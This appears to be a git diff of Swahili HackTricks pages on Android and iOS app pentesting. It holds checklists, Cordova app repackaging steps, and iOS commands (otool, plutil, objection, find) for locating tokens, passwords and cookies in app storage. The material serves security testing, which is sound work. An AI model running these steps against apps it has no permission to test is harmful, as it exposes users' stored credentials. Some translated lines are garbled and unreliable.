- [ ] Hii ni muhimu sana, kwa sababu ikiwa unaweza kukamata trafiki ya HTTP unaweza kutafuta udhaifu wa kawaida wa Mtandao (Hacktricks ina taarifa nyingi kuhusu udhaifu wa Mtandao).
- [ ] Angalia uwezekano wa [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (labda uchambuzi wa msimbo wa static utaweza kusaidia hapa)
- [ ] Angalia uwezekano wa [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (labda uchambuzi wa msimbo wa statiki utaweza kusaidia hapa)
- [ ] [Frida](android-app-pentesting/#frida): Frida tu, itumie kupata data ya kuvutia ya dynamic kutoka kwa programu (labda nywila zingine...)
### Some obfuscation/Deobfuscation information

6
src/mobile-pentesting/cordova-apps.md
View File

@ -18,7 +18,7 @@ npm install -g cordova@latest
cordova create bank-new com.android.bank Bank
cd bank-new
```
Nakili yaliyomo ya `bank/assets/www` hadi `bank-new/www`, ukiondoa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Nakili maudhui ya `bank/assets/www` hadi `bank-new/www`, ukiondoa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Taja jukwaa (Android au iOS) unapounda mradi mpya wa Cordova. Kwa kunakili programu ya Android, ongeza jukwaa la Android. Kumbuka kwamba toleo za jukwaa la Cordova na viwango vya API vya Android ni tofauti. Angalia [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) ya Cordova kwa maelezo kuhusu toleo za jukwaa na APIs za Android zinazoungwa mkono.
@ -34,7 +34,7 @@ Ikiwa plugin haipatikani kwenye npm, inaweza kupatikana kutoka GitHub:
cd bank-new
cordova plugin add https://github.com/moderna/cordova-plugin-cache.git
```
Hakikisha kuwa mahitaji yote ya awali yamekamilishwa kabla ya kukusanya:
Hakikisha mahitaji yote ya awali yamekamilishwa kabla ya kukusanya:
```bash
cd bank-new
cordova requirements
@ -44,7 +44,7 @@ Ili kujenga APK, tumia amri ifuatayo:
cd bank-new
cordova build android — packageType=apk
```
Amri hii inazalisha APK yenye chaguo la debug limewezeshwa, ikirahisisha ufuatiliaji kupitia Google Chrome. Ni muhimu kusaini APK kabla ya usakinishaji, hasa ikiwa programu ina mifumo ya kugundua uharibifu wa msimbo.
Amri hii inazalisha APK ikiwa na chaguo la debug limewezeshwa, kurahisisha ufuatiliaji kupitia Google Chrome. Ni muhimu kusaini APK kabla ya usakinishaji, hasa ikiwa programu ina mifumo ya kugundua uharibifu wa msimbo.
### Zana ya Utaftaji

12
src/mobile-pentesting/ios-pentesting-checklist.md
View File

@ -19,7 +19,7 @@
- [ ] [**Binary cookies**](ios-pentesting/#cookies) zinaweza kuhifadhi taarifa nyeti.
- [ ] [**Cache data**](ios-pentesting/#cache) inaweza kuhifadhi taarifa nyeti.
- [ ] [**Automatic snapshots**](ios-pentesting/#snapshots) zinaweza kuhifadhi taarifa nyeti za kuona.
- [ ] [**Keychain**](ios-pentesting/#keychain) kwa kawaida hutumika kuhifadhi taarifa nyeti ambazo zinaweza kuachwa wakati wa kuuza simu.
- [ ] [**Keychain**](ios-pentesting/#keychain) kwa kawaida hutumika kuhifadhi taarifa nyeti ambazo zinaweza kuachwa wakati wa kuuza tena simu.
- [ ] Kwa muhtasari, **angalia taarifa nyeti zilizohifadhiwa na programu katika mfumo wa faili.**
### Keyboards
@ -66,11 +66,11 @@
- [ ] Angalia kama programu **haiangalii na kusafisha** pembejeo za watumiaji kupitia scheme maalum na baadhi ya **udhaifu unaweza kutumika**.
- [ ] Angalia kama programu **inaweka wazi hatua yoyote nyeti** ambayo inaweza kuitwa kutoka mahali popote kupitia scheme maalum.
- [**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md)
- [ ] Angalia kama programu inaweza kupokea UIActivities na ikiwa inawezekana kutumia udhaifu wowote na shughuli iliyoundwa kwa njia maalum.
- [ ] Angalia kama programu inaweza kupokea UIActivities na kama inawezekana kutumia udhaifu wowote na shughuli iliyoundwa kwa njia maalum.
- [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md)
- [ ] Angalia kama programu **inaiga chochote kwenye pasteboard ya jumla**.
- [ ] Angalia kama programu **ina matumizi ya data kutoka pasteboard ya jumla kwa chochote**.
- [ ] Fuata pasteboard ili kuona kama **taarifa nyeti inakopiwa**.
- [ ] Angalia kama programu **inatumia data kutoka kwa pasteboard ya jumla kwa chochote**.
- [ ] Fuata pasteboard ili kuona kama **data nyeti inakopiwa**.
- [**App Extensions**](ios-pentesting/ios-app-extensions.md)
- [ ] Je, programu **inatumia nyongeza yoyote**?
- [**WebViews**](ios-pentesting/ios-webviews.md)
@ -87,7 +87,7 @@
### **Misc**
- [ ] Angalia kwa [**mekanismu ya patching/updating kiotomatiki**](ios-pentesting/#hot-patching-enforced-updateing).
- [ ] Angalia kwa [**maktaba za wahusika wa tatu zenye uharibifu**](ios-pentesting/#third-parties).
- [ ] Angalia kwa [**mekanismu za kurekebisha/kusasisha kiotomatiki**](ios-pentesting/#hot-patching-enforced-updateing).
- [ ] Angalia kwa [**maktaba za wahalifu wa tatu**](ios-pentesting/#third-parties).
{{#include ../banners/hacktricks-training.md}}

164
src/mobile-pentesting/ios-pentesting/README.md
View File

@ -20,7 +20,7 @@ ios-testing-environment.md
### Basic iOS Testing Operations
Wakati wa kupima **operesheni kadhaa zitapendekezwa** (unganisho na kifaa, kusoma/kandika/kupload/download faili, kutumia zana kadhaa...). Hivyo, ikiwa hujui jinsi ya kufanya mojawapo ya hatua hizi tafadhali, **anza kusoma ukurasa**:
Wakati wa kupima **operesheni kadhaa zitapendekezwa** (unganisho na kifaa, kusoma/kandika/kuhamasisha/kuhamasisha faili, kutumia zana kadhaa...). Hivyo, ikiwa hujui jinsi ya kufanya mojawapo ya vitendo hivi tafadhali, **anza kusoma ukurasa**:
{{#ref}}
basic-ios-testing-operations.md
@ -32,7 +32,7 @@ basic-ios-testing-operations.md
### Basic Static Analysis
Baadhi ya decompilers za iOS - IPA zinazovutia:
Baadhi ya decompilers za kuvutia za iOS - IPA files:
- https://github.com/LaurieWired/Malimite
- https://ghidra-sre.org/
@ -41,7 +41,7 @@ Inapendekezwa kutumia zana [**MobSF**](https://github.com/MobSF/Mobile-Security-
Utambuzi wa **ulinzi ulio katika binary**:
- **PIE (Position Independent Executable)**: Wakati umewezeshwa, programu inachukuliwa kwenye anwani ya kumbukumbu isiyo ya kawaida kila wakati inapoanzishwa, na kufanya kuwa ngumu kutabiri anwani yake ya awali ya kumbukumbu.
- **PIE (Position Independent Executable)**: Wakati umewezeshwa, programu inachukuliwa kwenye anwani ya kumbukumbu ya nasibu kila wakati inapoanzishwa, na kufanya kuwa ngumu kutabiri anwani yake ya awali ya kumbukumbu.
```bash
otool -hv <app-binary> | grep PIE # Inapaswa kujumuisha bendera ya PIE
@ -162,25 +162,25 @@ ios-hooking-with-objection.md
### Muundo wa IPA
Muundo wa **faili ya IPA** kimsingi ni sawa na **kifurushi kilichozibwa**. Kwa kubadilisha kiambatisho chake kuwa `.zip`, inaweza **kufunguliwa** ili kuonyesha yaliyomo. Ndani ya muundo huu, **Bundle** inawakilisha programu iliyopakiwa kikamilifu tayari kwa usakinishaji. Ndani, utapata directory inayoitwa `<NAME>.app`, ambayo inajumuisha rasilimali za programu.
Muundo wa **faili ya IPA** kimsingi ni sawa na **kifurushi kilichozungushwa**. Kwa kubadilisha kiambatisho chake kuwa `.zip`, inaweza **kufunguliwa** ili kuonyesha yaliyomo. Ndani ya muundo huu, **Bundle** inawakilisha programu iliyopakiwa kikamilifu tayari kwa usakinishaji. Ndani, utapata directory inayoitwa `<NAME>.app`, ambayo inajumuisha rasilimali za programu.
- **`Info.plist`**: Faili hii ina maelezo maalum ya usanidi wa programu.
- **`_CodeSignature/`**: Hii ni directory inayojumuisha faili ya plist ambayo ina saini, kuhakikisha uadilifu wa faili zote ndani ya bundle.
- **`Assets.car`**: Archive iliyoshinikizwa inayohifadhi faili za mali kama ikoni.
- **`Assets.car`**: Hifadhi iliyoshinikizwa inayohifadhi faili za mali kama ikoni.
- **`Frameworks/`**: Folda hii ina maktaba asilia za programu, ambazo zinaweza kuwa katika mfumo wa faili za `.dylib` au `.framework`.
- **`PlugIns/`**: Hii inaweza kujumuisha nyongeza kwa programu, inayojulikana kama faili za `.appex`, ingawa hazipo kila wakati. \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): Inatumika kuhifadhi data ya kudumu ya programu yako kwa matumizi ya mtandaoni, kuhifadhi data ya muda, na kuongeza uwezo wa kufuta kwenye programu yako kwenye kifaa kimoja. Ili kusawazisha data kati ya vifaa vingi katika akaunti moja ya iCloud, Core Data inakidhi kiotomatiki muundo wako kwenye kontena la CloudKit.
- [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): Faili ya `PkgInfo` ni njia mbadala ya kubainisha aina na misimbo ya mtengenezaji wa programu yako au bundle.
- **`PlugIns/`**: Hii inaweza kujumuisha nyongeza kwa programu, inayojulikana kama faili za `.appex`, ingawa hazipo kila wakati. \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): Inatumika kuhifadhi data ya kudumu ya programu yako kwa matumizi ya mtandaoni, kuhifadhi data ya muda, na kuongeza uwezo wa kufuta kwenye programu yako kwenye kifaa kimoja. Ili kusawazisha data kati ya vifaa vingi katika akaunti moja ya iCloud, Core Data inakidhi moja kwa moja muundo wako kwenye kontena la CloudKit.
- [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): Faili ya `PkgInfo` ni njia mbadala ya kubainisha aina na nambari za muundaji wa programu yako au bundle.
- **en.lproj, fr.proj, Base.lproj**: Ni pakiti za lugha ambazo zina rasilimali za lugha hizo maalum, na rasilimali ya chaguo-msingi endapo lugha haipatikani.
- **Usalama**: Directory ya `_CodeSignature/` ina jukumu muhimu katika usalama wa programu kwa kuthibitisha uadilifu wa faili zote zilizopakiwa kupitia saini za kidijitali.
- **Usimamizi wa Mali**: Faili ya `Assets.car` inatumia shinikizo ili kwa ufanisi kusimamia mali za picha, muhimu kwa kuboresha utendaji wa programu na kupunguza ukubwa wake kwa ujumla.
- **Usimamizi wa Mali**: Faili ya `Assets.car` inatumia shinikizo kusimamia kwa ufanisi mali za picha, muhimu kwa kuboresha utendaji wa programu na kupunguza ukubwa wake kwa ujumla.
- **Frameworks na PlugIns**: Hizi directory zinaonyesha uundaji wa programu za iOS, zikiwaruhusu waendelezaji kujumuisha maktaba za msimbo zinazoweza kutumika tena (`Frameworks/`) na kuongeza uwezo wa programu (`PlugIns/`).
- **Utafsiri**: Muundo huu unasaidia lugha nyingi, ukirahisisha kufikia programu duniani kwa kujumuisha rasilimali za pakiti za lugha maalum.
**Info.plist**
**Info.plist** inatumika kama msingi wa programu za iOS, ikijumuisha data muhimu za usanidi katika mfumo wa **funguo-thamani**. Faili hii ni lazima si tu kwa programu bali pia kwa nyongeza za programu na maktaba zilizopakiwa ndani. Imeundwa kwa muundo wa XML au muundo wa binary na ina taarifa muhimu kuanzia ruhusa za programu hadi usanidi wa usalama. Kwa uchambuzi wa kina wa funguo zinazopatikana, mtu anaweza kurejelea [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc).
**Info.plist** inatumika kama msingi wa programu za iOS, ikijumuisha data muhimu za usanidi katika mfumo wa **funguo-thamani**. Faili hii ni lazima si tu kwa programu bali pia kwa nyongeza za programu na maktaba zilizopakiwa ndani. Imeundwa kwa muundo wa XML au wa binary na ina taarifa muhimu kuanzia ruhusa za programu hadi usanidi wa usalama. Kwa uchambuzi wa kina wa funguo zinazopatikana, mtu anaweza kurejelea [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc).
Kwa wale wanaotaka kufanya kazi na faili hii katika muundo rahisi zaidi, ubadilishaji wa XML unaweza kufanywa kwa urahisi kupitia matumizi ya `plutil` kwenye macOS (inapatikana kiasili kwenye toleo 10.2 na baadaye) au `plistutil` kwenye Linux. Amri za ubadilishaji ni kama ifuatavyo:
Kwa wale wanaotaka kufanya kazi na faili hii kwa muundo rahisi, ubadilishaji wa XML unaweza kufanywa kwa urahisi kwa kutumia `plutil` kwenye macOS (inapatikana kiasili kwenye toleo 10.2 na baadaye) au `plistutil` kwenye Linux. Amri za ubadilishaji ni kama ifuatavyo:
- **Kwa macOS**:
```bash
@ -191,7 +191,7 @@ $ plutil -convert xml1 Info.plist
$ apt install libplist-utils
$ plistutil -i Info.plist -o Info_xml.plist
```
Kati ya maelezo mengi ambayo faili ya **Info.plist** inaweza kufichua, entries muhimu ni pamoja na nyuzi za ruhusa za programu (`UsageDescription`), mipango ya URL ya kawaida (`CFBundleURLTypes`), na mipangilio ya Usalama wa Usafiri wa Programu (`NSAppTransportSecurity`). Entries hizi, pamoja na nyingine kama aina za hati zilizopitishwa/zilizopokelewa za kawaida (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), zinaweza kupatikana kwa urahisi kwa kukagua faili au kutumia amri rahisi ya `grep`:
Kati ya maelezo mengi ambayo faili ya **Info.plist** inaweza kufichua, entries muhimu ni pamoja na nyuzi za ruhusa za programu (`UsageDescription`), mipango ya URL ya kawaida (`CFBundleURLTypes`), na mipangilio ya Usalama wa Usafiri wa Programu (`NSAppTransportSecurity`). Entries hizi, pamoja na nyingine kama aina za hati za kawaida zilizotolewa/zilizopokelewa (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`), zinaweza kupatikana kwa urahisi kwa kukagua faili au kutumia amri rahisi ya `grep`:
```bash
$ grep -i <keyword> Info.plist
```
@ -202,9 +202,9 @@ Katika mazingira ya iOS, directories zimewekwa maalum kwa ajili ya **system appl
> [!WARNING]
> Kwa kuwa programu katika iOS lazima ziwe sandboxed, kila app pia itakuwa na folda ndani ya **`$HOME/Library/Containers`** yenye **`CFBundleIdentifier`** ya app kama jina la folda.
>
> Hata hivyo, folda zote mbili (folda za data & folda za container) zina faili **`.com.apple.mobile_container_manager.metadata.plist`** inayounganisha faili hizo mbili katika ufunguo `MCMetadataIdentifier`).
> Hata hivyo, folda zote mbili (data & container folders) zina faili **`.com.apple.mobile_container_manager.metadata.plist`** inayounganisha faili hizo mbili katika ufunguo `MCMetadataIdentifier`).
Ili kuwezesha kugundua directory ya usakinishaji wa app iliyowekwa na mtumiaji, zana ya **objection tool** inatoa amri muhimu, `env`. Amri hii inaonyesha taarifa za kina za directory kwa app husika. Hapa chini kuna mfano wa jinsi ya kutumia amri hii:
Ili kuwezesha kugundua directory ya usakinishaji ya app iliyowekwa na mtumiaji, **objection tool** inatoa amri muhimu, `env`. Amri hii inaonyesha taarifa za kina za directory kwa app husika. Hapa chini kuna mfano wa jinsi ya kutumia amri hii:
```bash
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env
@ -219,7 +219,7 @@ Kwa upande mwingine, jina la programu linaweza kutafutwa ndani ya `/private/var/
```bash
find /private/var/containers -name "Progname*"
```
Amri kama `ps` na `lsof` zinaweza pia kutumika kubaini mchakato wa programu na kuorodhesha faili zilizo wazi, mtawalia, zikitoa maarifa kuhusu njia za saraka za programu zinazofanya kazi:
Amri kama `ps` na `lsof` zinaweza pia kutumika kubaini mchakato wa programu na orodha ya faili zilizo wazi, mtawalia, zikitoa maarifa kuhusu njia za saraka za programu zinazofanya kazi:
```bash
ps -ef | grep -i <app-name>
lsof -p <pid> | grep -i "/containers" | head -n 1
@ -227,7 +227,7 @@ lsof -p <pid> | grep -i "/containers" | head -n 1
**Bundle directory:**
- **AppName.app**
- Hii ni Application Bundle kama ilivyoonekana awali katika IPA, ina data muhimu za programu, maudhui ya kudumu pamoja na binary iliyokusanywa ya programu.
- Hii ni Application Bundle kama ilivyoonekana hapo awali katika IPA, ina data muhimu za programu, maudhui ya kudumu pamoja na binary iliyokusanywa ya programu.
- Hii directory inaonekana kwa watumiaji, lakini **watumiaji hawawezi kuandika ndani yake**.
- Maudhui katika hii directory **hayahifadhiwi**.
- Maudhui ya folda hii yanatumika **kuhakiki saini ya msimbo**.
@ -235,7 +235,7 @@ lsof -p <pid> | grep -i "/containers" | head -n 1
**Data directory:**
- **Documents/**
- Inashikilia data yote iliyoundwa na mtumiaji. Mtumiaji wa mwisho wa programu anaanzisha uundaji wa data hii.
- Inashikilia data yote inayozalishwa na mtumiaji. Mtumiaji wa mwisho wa programu anaanzisha uundaji wa data hii.
- Inaonekana kwa watumiaji na **watumiaji wanaweza kuandika ndani yake**.
- Maudhui katika hii directory **yanahifadhiwa**.
- Programu inaweza kuzima njia kwa kuweka `NSURLIsExcludedFromBackupKey`.
@ -243,25 +243,25 @@ lsof -p <pid> | grep -i "/containers" | head -n 1
- Inashikilia **faili ambazo si maalum kwa mtumiaji**, kama **caches**, **preferences**, **cookies**, na faili za usanidi wa orodha ya mali (plist).
- Programu za iOS kwa kawaida hutumia `Application Support` na `Caches` subdirectories, lakini programu inaweza kuunda subdirectories za kawaida.
- **Library/Caches/**
- Inashikilia **faili za cache zisizo za kudumu.**
- Inashikilia **faili za cache zisizo na kudumu.**
- Haionekani kwa watumiaji na **watumiaji hawawezi kuandika ndani yake**.
- Maudhui katika hii directory **hayahifadhiwi**.
- OS inaweza kufuta faili za directory hii kiotomatiki wakati programu haiko inatumika na nafasi ya kuhifadhi inakuwa ndogo.
- OS inaweza kufuta faili za directory hii kiotomatiki wakati programu haiko inafanya kazi na nafasi ya kuhifadhi inakosekana.
- **Library/Application Support/**
- Inashikilia **faili za kudumu** zinazohitajika kwa ajili ya kuendesha programu.
- Inashikilia **faili** **za kudumu** zinazohitajika kwa ajili ya kuendesha programu.
- **Haionekani** **kwa** **watumiaji** na watumiaji hawawezi kuandika ndani yake.
- Maudhui katika hii directory **yanahifadhiwa**.
- Programu inaweza kuzima njia kwa kuweka `NSURLIsExcludedFromBackupKey`.
- **Library/Preferences/**
- Inatumika kuhifadhi mali ambazo zinaweza **kuendelea hata baada ya programu kuanzishwa tena**.
- Inatumika kuhifadhi mali ambazo zinaweza **kudumu hata baada ya programu kuanzishwa tena**.
- Taarifa huhifadhiwa, bila usimbaji, ndani ya sandbox ya programu katika faili ya plist inayoitwa \[BUNDLE_ID].plist.
- Mifano yote ya funguo/thamani iliyohifadhiwa kwa kutumia `NSUserDefaults` inaweza kupatikana katika faili hii.
- **tmp/**
- Tumia hii directory kuandika **faili za muda** ambazo hazihitaji kudumu kati ya uzinduzi wa programu.
- Inashikilia faili za cache zisizo za kudumu.
- Inashikilia faili za cache zisizo na kudumu.
- **Haionekani** kwa watumiaji.
- Maudhui katika hii directory hayahifadhiwi.
- OS inaweza kufuta faili za directory hii kiotomatiki wakati programu haiko inatumika na nafasi ya kuhifadhi inakuwa ndogo.
- OS inaweza kufuta faili za directory hii kiotomatiki wakati programu haiko inafanya kazi na nafasi ya kuhifadhi inakosekana.
Hebu tuangalie kwa karibu Application Bundle ya iGoat-Swift (.app) ndani ya directory ya Bundle (`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`):
```bash
@ -279,7 +279,7 @@ Regular 420 None ... README.txt
```
### Binary Reversing
Ndani ya folda `<application-name>.app` utaona faili la binary linaloitwa `<application-name>`. Hili ndilo faili litakalokuwa **linafanywa kazi**. Unaweza kufanya ukaguzi wa msingi wa binary kwa kutumia chombo **`otool`**:
Ndani ya folda `<application-name>.app` utaona faili la binary linaloitwa `<application-name>`. Hii ndiyo faili itakayokuwa **inatekelezwa**. Unaweza kufanya ukaguzi wa msingi wa binary kwa kutumia chombo **`otool`**:
```bash
otool -Vh DVIA-v2 #Check some compilation attributes
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
@ -315,7 +315,7 @@ DVIA-v2:
0000000100004acc adrp x10, 1098 ; 0x10044e000
0000000100004ad0 add x10, x10, #0x268
```
Ili kuchapisha **sehemu ya Objective-C** ya programu ya mfano, mtu anaweza kutumia:
Ili kuchapisha **sehemu ya Objective-C** ya programu ya mfano mtu anaweza kutumia:
```bash
otool -oV DVIA-v2
DVIA-v2:
@ -355,7 +355,7 @@ double _field1;
double _field2;
};
```
Hata hivyo, chaguzi bora za kufungua binary ni: [**Hopper**](https://www.hopperapp.com/download.html?) na [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/).
Hata hivyo, chaguo bora za kufungua binary ni: [**Hopper**](https://www.hopperapp.com/download.html?) na [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/).
## Hifadhi ya Data
@ -366,16 +366,16 @@ ios-basics.md
{{#endref}}
> [!WARNING]
> Mahali yafuatayo pa kuhifadhi taarifa yanapaswa kuangaliwa **mara tu baada ya kufunga programu**, **baada ya kuangalia kazi zote** za programu na hata baada ya **kutoka kwa mtumiaji mmoja na kuingia kwa mwingine**.\
> Mahali yafuatayo pa kuhifadhi taarifa yanapaswa kukaguliwa **mara tu baada ya kufunga programu**, **baada ya kuangalia kazi zote** za programu na hata baada ya **kutoka kwa mtumiaji mmoja na kuingia kwa mwingine**.\
> Lengo ni kupata **taarifa nyeti zisizo na ulinzi** za programu (nywila, tokeni), za mtumiaji wa sasa na za watumiaji waliowahi kuingia.
### Plist
Faili za **plist** ni faili za XML zilizopangwa ambazo **zinafunguo na thamani**. Ni njia ya kuhifadhi data ya kudumu, hivyo wakati mwingine unaweza kupata **taarifa nyeti katika faili hizi**. Inapendekezwa kuangalia faili hizi baada ya kufunga programu na baada ya kuitumia kwa nguvu ili kuona kama data mpya imeandikwa.
Faili za **plist** ni faili za XML zilizopangwa ambazo **zinafunguo-na-thamani**. Ni njia ya kuhifadhi data ya kudumu, hivyo wakati mwingine unaweza kupata **taarifa nyeti katika faili hizi**. Inapendekezwa kukagua faili hizi baada ya kufunga programu na baada ya kuitumia kwa nguvu ili kuona kama data mpya imeandikwa.
Njia ya kawaida ya kudumisha data katika faili za plist ni kupitia matumizi ya **NSUserDefaults**. Faili hii ya plist huhifadhiwa ndani ya sandbox ya programu katika **`Library/Preferences/<appBundleID>.plist`**
Njia ya kawaida ya kuhifadhi data katika faili za plist ni kupitia matumizi ya **NSUserDefaults**. Faili hii ya plist huhifadhiwa ndani ya sandbox ya programu katika **`Library/Preferences/<appBundleID>.plist`**
Darasa la [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) linatoa kiolesura cha programu kwa ajili ya kuingiliana na mfumo wa default. Mfumo wa default unaruhusu programu kubadilisha tabia yake kulingana na **mapendeleo ya mtumiaji**. Data iliyohifadhiwa na `NSUserDefaults` inaweza kuonekana katika kifurushi cha programu. Darasa hili huhifadhi **data** katika **faili ya plist**, lakini imekusudiwa kutumika na kiasi kidogo cha data.
Darasa la [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) linatoa kiolesura cha programu kwa ajili ya kuingiliana na mfumo wa default. Mfumo wa default unaruhusu programu kubadilisha tabia yake kulingana na **mapendeleo ya mtumiaji**. Data iliyohifadhiwa na `NSUserDefaults` inaweza kuonekana katika kifurushi cha programu. Darasa hili huhifadhi **data** katika **faili ya plist**, lakini inapaswa kutumika na kiasi kidogo cha data.
Data hii haiwezi kufikiwa moja kwa moja kupitia kompyuta iliyoaminika, lakini inaweza kufikiwa kwa kufanya **backup**.
@ -396,7 +396,7 @@ $ plutil -convert xml1 Info.plist
$ apt install libplist-utils
$ plistutil -i Info.plist -o Info_xml.plist
```
**Katika Kikao cha Objection:** Kwa kuchambua programu za simu, amri maalum inaruhusu kubadilisha faili za plist moja kwa moja:
**Ndani ya Kikao cha Objection:** Kwa kuchambua programu za simu, amri maalum inaruhusu kubadilisha faili za plist moja kwa moja:
```bash
ios plist cat /private/var/mobile/Containers/Data/Application/<Application-UUID>/Library/Preferences/com.some.package.app.plist
```
@ -434,17 +434,17 @@ NSLog(@"data stored in core data");
### YapDatabase
[YapDatabase](https://github.com/yapstudios/YapDatabase) ni duka la funguo/thamani lililojengwa juu ya SQLite.\
Kwa kuwa databasi za Yap ni databasi za sqlite unaweza kuziona ukitumia amri iliyopendekezwa katika sehemu iliyopita.
Kwa kuwa databasi za Yap ni databasi za sqlite unaweza kuziona kwa kutumia amri iliyopendekezwa katika sehemu iliyopita.
### Databasi Nyingine za SQLite
Ni kawaida kwa programu kuunda databasi zao za sqlite. Wanaweza kuwa **wanahifadhi** **data** **nyeti** kwenye hizo na kuziacha bila usimbaji. Hivyo, kila wakati ni muhimu kuangalia kila databasi ndani ya directory ya programu. Hivyo nenda kwenye directory ya programu ambapo data imehifadhiwa (`/private/var/mobile/Containers/Data/Application/{APPID}`)
Ni kawaida kwa programu kuunda databasi zao za sqlite. Wanaweza kuwa **wanahifadhi** **data** **nyeti** kwenye hizo na kuziacha bila usimbaji. Kwa hivyo, kila wakati ni muhimu kuangalia kila databasi ndani ya saraka ya programu. Kwa hivyo nenda kwenye saraka ya programu ambapo data imehifadhiwa (`/private/var/mobile/Containers/Data/Application/{APPID}`)
```bash
find ./ -name "*.sqlite" -or -name "*.db"
```
### Firebase Real-Time Databases
Wakuu wa programu wana uwezo wa **kuhifadhi na kusawazisha data** ndani ya **hifadhi ya data ya NoSQL iliyo kwenye wingu** kupitia Firebase Real-Time Databases. Data hiyo inahifadhiwa katika muundo wa JSON, na inasawazishwa kwa wateja wote waliounganishwa kwa wakati halisi.
Wakuu wa programu wana uwezo wa **kuhifadhi na kusawazisha data** ndani ya **hifadhi ya data ya NoSQL inayohifadhiwa kwenye wingu** kupitia Firebase Real-Time Databases. Data iliyohifadhiwa katika muundo wa JSON, inasawazishwa kwa wateja wote waliounganishwa kwa wakati halisi.
Unaweza kupata jinsi ya kuangalia hifadhidata za Firebase zilizopangwa vibaya hapa:
@ -477,9 +477,9 @@ let realm = try Realm(configuration: config)
fatalError("Error opening realm: \(error)")
}
```
### Databases za Couchbase Lite
### Couchbase Lite Databases
[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) in وصفwa kama injini ya **nyepesi** na **imejumuishwa** ya hifadhidata inayofuata mbinu ya **mwelekeo wa hati** (NoSQL). Imeundwa kuwa asili kwa **iOS** na **macOS**, inatoa uwezo wa kusawazisha data bila mshono.
[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) inafafanuliwa kama **nyepesi** na **imejumuishwa** injini ya hifadhidata inayofuata mbinu ya **mwelekeo wa hati** (NoSQL). Imeundwa kuwa asili kwa **iOS** na **macOS**, inatoa uwezo wa kusawazisha data bila mshono.
Ili kubaini hifadhidata za Couchbase zinazoweza kuwa kwenye kifaa, directory ifuatayo inapaswa kukaguliwa:
```bash
@ -487,9 +487,9 @@ ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application S
```
### Cookies
iOS huhifadhi vidakuzi vya programu katika **`Library/Cookies/cookies.binarycookies`** ndani ya folda za kila programu. Hata hivyo, waendelezaji wakati mwingine huamua kuviweka katika **keychain** kwani **faili ya cookie inaweza kufikiwa katika nakala za akiba**.
iOS huhifadhi vidakuzi vya programu katika **`Library/Cookies/cookies.binarycookies`** ndani ya folda za kila programu. Hata hivyo, waendelezaji wakati mwingine huamua kuviweka katika **keychain** kwani **faili ya vidakuzi inaweza kufikiwa katika nakala za akiba**.
Ili kuchunguza faili ya vidakuzi unaweza kutumia [**hii script ya python**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) au tumia **`ios cookies get`** ya objection.\
Ili kuchunguza faili ya vidakuzi unaweza kutumia [**hii python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) au tumia **`ios cookies get`** ya objection.\
**Unaweza pia kutumia objection kubadilisha faili hizi kuwa muundo wa JSON na kuchunguza data.**
```bash
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
@ -508,17 +508,17 @@ Ili kuchunguza faili ya vidakuzi unaweza kutumia [**hii script ya python**](http
```
### Cache
Kwa default NSURLSession inahifadhi data, kama **HTTP requests and responses katika Cache.db** database. Hii database inaweza kuwa na **data nyeti**, ikiwa tokeni, majina ya watumiaji au taarifa nyingine nyeti zimehifadhiwa. Ili kupata taarifa zilizohifadhiwa fungua directory ya data ya app (`/var/mobile/Containers/Data/Application/<UUID>`) na nenda kwenye `/Library/Caches/<Bundle Identifier>`. **WebKit cache pia inahifadhiwa katika Cache.db** file. **Objection** inaweza kufungua na kuingiliana na database kwa amri `sqlite connect Cache.db`, kwani ni n**ormal SQLite database**.
Kwa kawaida NSURLSession huhifadhi data, kama **maombi na majibu ya HTTP katika Cache.db** database. Hii database inaweza kuwa na **data nyeti**, ikiwa tokeni, majina ya watumiaji au taarifa nyingine nyeti zimehifadhiwa. Ili kupata taarifa zilizohifadhiwa fungua directory ya data ya programu (`/var/mobile/Containers/Data/Application/<UUID>`) na nenda kwenye `/Library/Caches/<Bundle Identifier>`. **WebKit cache pia huhifadhiwa katika faili ya Cache.db**. **Objection** inaweza kufungua na kuingiliana na database kwa amri `sqlite connect Cache.db`, kwani ni n**ormal SQLite database**.
Inapendekezwa **kuondoa Caching data hii**, kwani inaweza kuwa na taarifa nyeti katika ombi au jibu. Orodha ifuatayo inaonyesha njia tofauti za kufanikisha hili:
Inapendekezwa **kuondoa uhifadhi wa data hii**, kwani inaweza kuwa na taarifa nyeti katika ombi au jibu. Orodha ifuatayo inaonyesha njia tofauti za kufanikisha hili:
1. Inapendekezwa kuondoa majibu yaliyohifadhiwa baada ya kutoka. Hii inaweza kufanywa kwa njia iliyotolewa na Apple inayoitwa [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses) Unaweza kuita njia hii kama ifuatavyo:
